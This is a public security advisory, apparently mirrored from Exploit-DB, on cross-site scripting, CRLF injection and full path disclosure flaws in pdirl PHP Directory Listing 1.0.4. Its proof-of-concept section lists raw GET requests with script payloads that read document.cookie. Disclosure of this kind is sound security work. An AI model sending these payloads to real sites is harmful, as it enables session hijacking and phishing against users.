pdirl PHP Directory Listing 1.0.4 – Cross-Site Scripting

  • 作者: Vulnerability-Lab
    日期: 2013-11-01
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  • 来源:https://www.exploit-db.com/exploits/29354/
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    pdirl PHP Directory Listing 1.0.4 - Cross Site Scripting Web Vulnerabilities
    
    
    References (Source):
    ====================
    http://www.vulnerability-lab.com/get_content.php?id=1130
    
    
    Release Date:
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    2013-11-01
    
    
    Vulnerability Laboratory ID (VL-ID):
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    1130
    
    
    Common Vulnerability Scoring System:
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    3.4
    
    
    Product & Service Introduction:
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    pdirl (PHPDirListing) is a tiny directory listing program. It is meant to be better looking and more useful than the 
    directory listings produced by Apache. I didn`t want to reinvent the wheel so I looked for an existing PHP script and 
    I ve found PHPDL by Greg Johnson, I added some features to it. (1.0.x is no longer based on PHPDL.)
    
    (Copy of the Vendor Homepage: http://pdirl.newroots.de/ ) 
    
    
    Abstract Advisory Information:
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    An independent Vulnerability Laboratory Researcher discovered multiple web vulnerabilities in the pdirl PHP Listing v1.0.4 web-application.
    
    
    Vulnerability Disclosure Timeline:
    ==================================
    2013-11-01:Public Disclosure (Vulnerability Laboratory)
    
    
    Discovery Status:
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    Published
    
    
    Affected Product(s):
    ====================
    Greg Johnson
    Product: pdirl PHP Listing - Web Application 1.0.4
    
    
    Exploitation Technique:
    =======================
    Remote
    
    
    Severity Level:
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    Medium
    
    
    Technical Details & Description:
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    Multiple client-side cross site scripting vulnerabilities are detected in the official pdirl PHP Directory Listing web-application.
    The vulnerability allows remote attackers to manipulate via GET method web-application to browser requests (client-side).
    
    The client-side cross site scripting web vulnerability is located in the vulnerable index.php file and the id path value.
    Remote attackers can manipulate the `index.php` file GET method request with the vulnerable ./pdirl path value to compromise 
    client-side web application context.
    
    Successful exploitation of the client-side cross site scripting web vulnerability results in session hijacking, client-side 
    phishing, client-side unauthorized external redirects and client-side manipulation of the contact formular module context.
    
    
    Vulnerable Module(s):
    				[+] .pdirl
    
    Vulnerable File(s):
    				[+] index.php
    
    Vulnerable Path:
    				[+] ../icons/
    				[+] ../icons/default
    				[+] ../template/
    				[+] ../template/default
    				[+] ../.pdirl/templates
    
    
    Proof of Concept (PoC):
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    The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without privileged web application user 
    account but with low user interaction. For demonstration or to reproduce ...
    
    PoC: CS Cross Site Scripting 
    
    GET /[PATH]/?"onmouseover='prompt(7331)'bad="> HTTP/1.1
    GET /[PATH]/.pdirl/?"onmouseover='prompt(document.cookie)'bad="> HTTP/1.1
    GET /[PATH]/.pdirl/icons/?</title>1<ScRiPt>prompt(document.cookie)</ScRiPt> HTTP/1.1
    GET /[PATH]/.pdirl/icons/default/?"onmouseover='prompt(document.cookie)'bad="> HTTP/1.1
    GET /[PATH]/.pdirl/templates/?"onmouseover='prompt(document.cookie)'bad="> HTTP/1.1
    GET /[PATH]/.pdirl/templates/default/?</title>1<ScRiPt>prompt(document.cookie)</ScRiPt> HTTP/1.1
    GET /[PATH]/index.php/%22onmouseover%3d'prompt(document.cookie)'bad%3d%22> HTTP/1.1
    GET /[PATH]/index.php?directory=.pdirl/templates/%22%20onmouseover%3dprompt(7331)%20bad%3d%22 HTTP/1.1
    
    
    PoC: CRLF injection/HTTP Response Splitting
    GET /[PATH]/index.php?directory=%0d%0a%20[CSRF:FORM:INJECT!]&sortkey=name
    
    
    PoC: Full Path Disclosure Links
    GET /[PATH]/index.php?directory='"\'\");|]*{%0d%0a<%00>%bf%27'&sortkey=name&sortorder=SORT_DESC HTTP/1.1
    GET /[PATH]/index.php?directory='"\'\");|]*{%0d%0a<%00>%bf%27'&gosearch=Search... HTTP/1.1
    GET /[PATH]/index.php?directory=./&gosearch='"\'\");|]*{%0d%0a<%00>%bf%27' HTTP/1.1
    GET /[PATH]/index.php?directory=./?directory=./&search=..%c0%af HTTP/1.1
    
    
    Security Risk:
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    1.1
    The security risk of the client-side cross site scripting web vulnerabilities are estimated as medium.
    
    1.2
    The security risk of the client-side cross site request forgery web vulnerability is estimated as medium(-).
    
    1.3
    The security risk of the full path disclosure issue is estimated as low.
    
    
    Credits & Authors:
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    lincoln.dll (linc0ln.dll@hotmail.com) [www.hackinq.pl]
    
    
    
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